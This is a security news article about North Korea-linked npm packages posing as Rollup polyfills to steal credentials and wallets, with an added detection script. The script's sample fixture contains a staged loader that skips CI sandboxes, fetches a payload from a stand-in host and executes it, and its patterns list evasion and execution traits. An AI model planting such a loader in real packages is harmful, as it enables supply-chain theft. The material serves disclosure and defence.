npm packages associated with North Korea are masquerading as Rollup polyfill tools in an attempt to steal developers' sensitive information.


TL;DR: Six malicious npm packages posing as Rollup polyfill tools stole developer credentials and provided remote access in a campaign linked to Lazarus.

Security researchers at JFrog have identified a group of malicious npm packages attributed to North Korean threat actors. The packages imitate genuine Rollup polyfill tooling in order to steal developer credentials and give the attackers remote access to compromised systems. Two of them, “rollup-packages-polyfill-core” and “rollup-runtime-polyfill-core,” closely mimic the legitimate “rollup-plugin-polyfill-node” project in their description, repository metadata, and package layout. All six packages have since been removed from the npm registry.

The attack uses a multi-stage delivery chain designed to avoid detection. The initial packages pull in concealed second-stage dependencies disguised as SVG utilities; those dependencies retrieve a JSON object from a remote service and execute the payload embedded in it. JFrog noted that this staging, together with the look-alike names, credible metadata, and environment checks that abort execution inside sandboxes and cloud development platforms, matches earlier npm campaigns attributed to Lazarus.
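A practitioner reading the description above will want a way to check an installed dependency tree for the same traits: install-time lifecycle hooks, a dependency that a build plugin has no obvious reason to need, and code that fetches remote content and evaluates it, gated on CI or cloud-IDE markers. The script below is an added example written for this page; it is not code from JFrog's write-up or from the packages it describes. It works on an in-memory model of the tree (manifest plus shipped files per package), and the package names and file contents are constructed for the demonstration.

```javascript
// Added example (not code from the JFrog write-up or from the packages it
// describes): a heuristic audit of an installed npm dependency tree for the
// traits the campaign relies on. Package names and contents below are
// constructed for the demo.

// Lifecycle scripts that run automatically on `npm install`.
const INSTALL_HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];

// Source-level traits worth a second look in a build-tool plugin.
const SUSPICIOUS_PATTERNS = [
  { kind: 'dynamic-eval',    re: /\b(eval|new\s+Function)\s*\(/ },
  { kind: 'remote-fetch',    re: /\b(https?\.(get|request)|fetch|axios)\s*\(/ },
  { kind: 'child-process',   re: /require\(\s*['"]child_process['"]\s*\)/ },
  // Checks for CI / cloud-IDE markers are how a loader decides to stay quiet.
  { kind: 'env-fingerprint', re: /process\.env\.(CI|CODESPACES|GITPOD_WORKSPACE_ID|AWS_LAMBDA_FUNCTION_NAME)\b/ },
];

// Weights for the score; anything not listed counts 1.
const WEIGHTS = { 'lifecycle-hook': 2, 'staged-loader': 5 };

// Audit one package: its manifest (package.json) and the JS files it ships.
function auditPackage(pkg) {
  const findings = [];
  const scripts = pkg.manifest.scripts || {};
  for (const hook of INSTALL_HOOKS) {
    if (scripts[hook]) findings.push({ kind: 'lifecycle-hook', detail: `${hook}: ${scripts[hook]}` });
  }
  for (const [file, source] of Object.entries(pkg.files)) {
    for (const p of SUSPICIOUS_PATTERNS) {
      if (p.re.test(source)) findings.push({ kind: p.kind, detail: file });
    }
  }
  // Fetching remote content and evaluating code in the same package is the
  // second-stage loader shape described above; score it as one combined trait.
  const kinds = new Set(findings.map((f) => f.kind));
  if (kinds.has('remote-fetch') && kinds.has('dynamic-eval')) {
    findings.push({ kind: 'staged-loader', detail: 'fetches remote content and evaluates code' });
  }
  return findings;
}

function riskScore(findings) {
  return findings.reduce((sum, f) => sum + (WEIGHTS[f.kind] || 1), 0);
}

// Audit a flattened tree; `via` names the top-level dependency that pulled
// the package in, so a hidden second stage is reported against its parent.
function auditTree(packages, threshold = 5) {
  return packages
    .map((pkg) => {
      const findings = auditPackage(pkg);
      return { name: pkg.name, via: pkg.via, score: riskScore(findings), findings };
    })
    .filter((r) => r.score >= threshold);
}

// Constructed sample tree (hypothetical names). The first package looks like
// an ordinary Rollup plugin; the second is the hidden "SVG utility" it pulls in.
const SAMPLE_PACKAGES = [
  {
    name: 'example-polyfill-plugin',
    via: 'example-polyfill-plugin',
    manifest: { name: 'example-polyfill-plugin', dependencies: { 'example-svg-helper': '^1.0.0' } },
    files: {
      'index.js': "module.exports = function polyfillNode() { return { name: 'polyfill-node', resolveId(id) { return id === 'fs' ? 'polyfill-fs' : null; } }; };",
    },
  },
  {
    name: 'example-svg-helper',
    via: 'example-polyfill-plugin',
    manifest: { name: 'example-svg-helper', scripts: { postinstall: 'node setup.js' } },
    files: {
      'setup.js': [
        "const https = require('https');",
        "if (process.env.CI || process.env.CODESPACES) process.exit(0);",
        "https.get('https://example.invalid/config', (res) => {",
        "  let body = ''; res.on('data', (d) => { body += d; });",
        "  res.on('end', () => { const cfg = JSON.parse(body); new Function(cfg.payload)(); });",
        "});",
      ].join('\n'),
    },
  },
];

if (typeof require !== 'undefined' && require.main === module) {
  console.log(JSON.stringify(auditTree(SAMPLE_PACKAGES), null, 2));
}
```

Run against the sample tree, the benign plugin scores 0 and the hidden helper scores 10 (postinstall hook, remote fetch, dynamic evaluation, environment fingerprinting, and the combined staged-loader trait), attributed to the top-level package that pulled it in. The heuristics are deliberately coarse and will flag some legitimate packages; they are a triage aid, not a verdict. The cheapest structural control against the install-hook stage is to disable lifecycle scripts for untrusted installs with `npm install --ignore-scripts` (or `ignore-scripts=true` in `.npmrc`) and re-enable them only for packages that have been reviewed.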

Once executed, the malware gives the attacker both data-collection and remote-control capabilities on the compromised machine. The payload harvests data from web browsers and cryptocurrency wallets, periodically captures clipboard contents, and collects files with specific extensions. It also targets the configuration of developer tools such as VS Code, Windsurf, and Cursor, credentials for AWS, Microsoft Azure, Google Gemini, and Anthropic Claude, and SSH keys.

This campaign is part of a broader trend. In April, Panther researchers documented an ongoing Lazarus npm operation that published 108 malicious packages across 261 versions to deploy BeaverTail and OtterCookie, two known malware families linked to the Contagious Interview campaign. The latest packages share traits with OtterCookie, including the use of a modified keyboard and mouse control library that enables interactive remote sessions, screenshot capture, and simulated user input on compromised Windows machines.

The disclosure coincides with a larger wave of supply chain attacks on open-source package registries. Researchers from Checkmarx, SafeDep, and AWS have separately reported clusters of malicious packages on npm and PyPI designed to steal cloud credentials, cryptocurrency wallets, SSH keys, and developer secrets. Rollup plugins run on developer workstations and in CI build pipelines, environments that are increasingly targeted for supply chain compromise and that typically hold access to sensitive assets such as source code, API keys, and project secrets.

Published July 3, 2026 - 4:55 pm UTC



Malicious npm packages that impersonate Rollup polyfill tools are designed to steal browser data, cryptocurrency wallets, and credentials for AI tools in a campaign associated with Lazarus.